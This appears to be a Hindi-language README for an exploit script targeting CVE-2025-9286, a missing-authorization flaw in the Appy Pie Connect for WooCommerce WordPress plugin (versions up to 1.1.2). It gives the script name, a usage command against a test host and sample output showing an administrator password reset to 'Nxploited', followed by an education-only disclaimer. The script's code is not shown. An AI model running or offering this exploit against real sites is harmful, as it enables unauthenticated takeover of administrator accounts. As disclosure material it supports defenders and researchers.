
Appy Pie Connect for WooCommerce <= 1.1.2 - लापता प्राधिकरण से बिना प्रमाणीकरण के विशेषाधिकार वृद्धि
Appy Pie Connect for WooCommerce <= 1.1.2 - अप्रमाणित विशेषाधिकार वृद्धि के लिए अनुपस्थित प्राधिकरण
WordPress के लिए Appy Pie Connect for WooCommerce प्लगइन, reset_user_password() REST हैंडलर के भीतर अनुपस्थित प्राधिकरण के कारण, 1.1.2 तक (और सहित) सभी संस्करणों में विशेषाधिकार वृद्धि की भेद्यता से ग्रस्त है।
यह अप्रमाणित हमलावरों को व्यवस्थापकों सहित किसी भी उपयोगकर्ता का पासवर्ड रीसेट करने में सक्षम बनाता है, जिससे उन्हें व्यवस्थापकीय पहुँच प्राप्त हो जाती है।
निम्नलिखित एक्सप्लॉइट का उपयोग भेद्य प्लगइन संस्करण चलाने वाली WordPress साइटों के विरुद्ध CVE-2025-9286 का फायदा उठाने के लिए किया जा सकता है।
स्क्रिप्ट नाम: CVE-2025-9286.py
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.
यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है।
स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध है।
इस टूल से होने वाले किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।
द्वारा: Khaled Alenazi (Nxploited)